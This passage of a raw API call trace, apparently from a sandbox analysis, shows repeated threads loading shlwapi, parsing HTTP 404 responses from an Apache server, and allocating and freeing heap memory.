(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0165.231] GetProcessHeap () returned 0x6a0000 [0165.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0165.231] GetProcessHeap () returned 0x6a0000 [0165.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 48 os_tid = 0xc84 [0165.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.434] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0165.434] GetProcessHeap () returned 0x6a0000 [0165.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea00 [0165.434] GetProcessHeap () returned 0x6a0000 [0165.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea00 | out: hHeap=0x6a0000) returned 1 [0165.434] GetProcessHeap () returned 0x6a0000 [0165.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 49 os_tid = 0xf88 [0165.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.695] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0165.695] GetProcessHeap () returned 0x6a0000 [0165.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea00 [0165.695] GetProcessHeap () returned 0x6a0000 [0165.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea00 | out: hHeap=0x6a0000) returned 1 [0165.695] GetProcessHeap () returned 0x6a0000 [0165.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 50 os_tid = 0x5c0 [0165.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.938] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0165.938] GetProcessHeap () returned 0x6a0000 [0165.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0165.938] GetProcessHeap () returned 0x6a0000 [0165.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0165.938] GetProcessHeap () returned 0x6a0000 [0165.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 51 os_tid = 0x69c [0166.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.176] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0166.176] GetProcessHeap () returned 0x6a0000 [0166.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0166.176] GetProcessHeap () returned 0x6a0000 [0166.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0166.176] GetProcessHeap () returned 0x6a0000 [0166.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 52 os_tid = 0x1324 [0166.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.362] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0166.362] GetProcessHeap () returned 0x6a0000 [0166.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0166.362] GetProcessHeap () returned 0x6a0000 [0166.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0166.362] GetProcessHeap () returned 0x6a0000 [0166.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 53 os_tid = 0x1320 [0166.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.597] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0166.597] GetProcessHeap () returned 0x6a0000 [0166.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0166.597] GetProcessHeap () returned 0x6a0000 [0166.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0166.597] GetProcessHeap () returned 0x6a0000 [0166.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 54 os_tid = 0x12d8 [0166.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0166.837] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0166.837] GetProcessHeap () returned 0x6a0000 [0166.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0166.837] GetProcessHeap () returned 0x6a0000 [0166.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0166.837] GetProcessHeap () returned 0x6a0000 [0166.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 55 os_tid = 0xd98 [0167.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.079] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.079] GetProcessHeap () returned 0x6a0000 [0167.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0167.080] GetProcessHeap () returned 0x6a0000 [0167.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0167.080] GetProcessHeap () returned 0x6a0000 [0167.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 56 os_tid = 0x1330 [0167.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.281] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.282] GetProcessHeap () returned 0x6a0000 [0167.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0167.282] GetProcessHeap () returned 0x6a0000 [0167.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0167.282] GetProcessHeap () returned 0x6a0000 [0167.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 57 os_tid = 0x694 [0167.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.486] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.486] GetProcessHeap () returned 0x6a0000 [0167.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0167.487] GetProcessHeap () returned 0x6a0000 [0167.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0167.487] GetProcessHeap () returned 0x6a0000 [0167.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 58 os_tid = 0xd4c [0167.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.688] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.688] GetProcessHeap () returned 0x6a0000 [0167.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0167.688] GetProcessHeap () returned 0x6a0000 [0167.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0167.688] GetProcessHeap () returned 0x6a0000 [0167.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 59 os_tid = 0xc94 [0167.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0167.957] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0167.957] GetProcessHeap () returned 0x6a0000 [0167.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0167.957] GetProcessHeap () returned 0x6a0000 [0167.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0167.957] GetProcessHeap () returned 0x6a0000 [0167.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 60 os_tid = 0x6d8 [0168.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.207] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0168.207] GetProcessHeap () returned 0x6a0000 [0168.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0168.207] GetProcessHeap () returned 0x6a0000 [0168.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0168.207] GetProcessHeap () returned 0x6a0000 [0168.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 61 os_tid = 0x7dc [0168.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.406] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0168.407] GetProcessHeap () returned 0x6a0000 [0168.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0168.407] GetProcessHeap () returned 0x6a0000 [0168.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0168.407] GetProcessHeap () returned 0x6a0000 [0168.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 62 os_tid = 0xc7c [0168.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.673] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0168.673] GetProcessHeap () returned 0x6a0000 [0168.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0168.673] GetProcessHeap () returned 0x6a0000 [0168.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0168.673] GetProcessHeap () returned 0x6a0000 [0168.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 63 os_tid = 0x644 [0168.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0168.966] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0168.967] GetProcessHeap () returned 0x6a0000 [0168.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0168.967] GetProcessHeap () returned 0x6a0000 [0168.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0168.967] GetProcessHeap () returned 0x6a0000 [0168.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 64 os_tid = 0xc50 [0169.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.252] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0169.252] GetProcessHeap () returned 0x6a0000 [0169.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0169.252] GetProcessHeap () returned 0x6a0000 [0169.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0169.252] GetProcessHeap () returned 0x6a0000 [0169.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 65 os_tid = 0x328 [0169.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.473] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0169.473] GetProcessHeap () returned 0x6a0000 [0169.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0169.473] GetProcessHeap () returned 0x6a0000 [0169.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0169.473] GetProcessHeap () returned 0x6a0000 [0169.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 66 os_tid = 0x224 [0169.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0169.676] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0169.676] GetProcessHeap () returned 0x6a0000 [0169.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0169.676] GetProcessHeap () returned 0x6a0000 [0169.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0169.676] GetProcessHeap () returned 0x6a0000 [0169.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 67 os_tid = 0xee0 [0170.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.079] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.079] GetProcessHeap () returned 0x6a0000 [0170.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0170.079] GetProcessHeap () returned 0x6a0000 [0170.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0170.079] GetProcessHeap () returned 0x6a0000 [0170.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 68 os_tid = 0x1e0 [0170.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.322] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.322] GetProcessHeap () returned 0x6a0000 [0170.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0170.322] GetProcessHeap () returned 0x6a0000 [0170.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0170.322] GetProcessHeap () returned 0x6a0000 [0170.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 69 os_tid = 0xbd0 [0170.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.543] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.543] GetProcessHeap () returned 0x6a0000 [0170.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0170.544] GetProcessHeap () returned 0x6a0000 [0170.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0170.544] GetProcessHeap () returned 0x6a0000 [0170.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 70 os_tid = 0xaf8 [0170.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.703] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.703] GetProcessHeap () returned 0x6a0000 [0170.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0170.703] GetProcessHeap () returned 0x6a0000 [0170.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0170.703] GetProcessHeap () returned 0x6a0000 [0170.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 71 os_tid = 0xc58 [0170.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.887] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0170.887] GetProcessHeap () returned 0x6a0000 [0170.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0170.887] GetProcessHeap () returned 0x6a0000 [0170.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0170.887] GetProcessHeap () returned 0x6a0000 [0170.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 72 os_tid = 0xc5c [0171.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.263] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.263] GetProcessHeap () returned 0x6a0000 [0171.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0171.263] GetProcessHeap () returned 0x6a0000 [0171.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0171.263] GetProcessHeap () returned 0x6a0000 [0171.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 73 os_tid = 0x12dc [0171.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.554] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.555] GetProcessHeap () returned 0x6a0000 [0171.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0171.555] GetProcessHeap () returned 0x6a0000 [0171.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0171.555] GetProcessHeap () returned 0x6a0000 [0171.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 74 os_tid = 0x12fc [0171.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.753] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.753] GetProcessHeap () returned 0x6a0000 [0171.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0171.753] GetProcessHeap () returned 0x6a0000 [0171.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0171.753] GetProcessHeap () returned 0x6a0000 [0171.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 75 os_tid = 0xd40 [0171.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0171.990] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0171.990] GetProcessHeap () returned 0x6a0000 [0171.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0171.990] GetProcessHeap () returned 0x6a0000 [0171.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0171.990] GetProcessHeap () returned 0x6a0000 [0171.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 76 os_tid = 0x12d0 [0172.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.159] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.159] GetProcessHeap () returned 0x6a0000 [0172.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0172.159] GetProcessHeap () returned 0x6a0000 [0172.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0172.160] GetProcessHeap () returned 0x6a0000 [0172.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 77 os_tid = 0x56c [0172.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0172.575] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0172.575] GetProcessHeap () returned 0x6a0000 [0172.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0172.575] GetProcessHeap () returned 0x6a0000 [0172.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 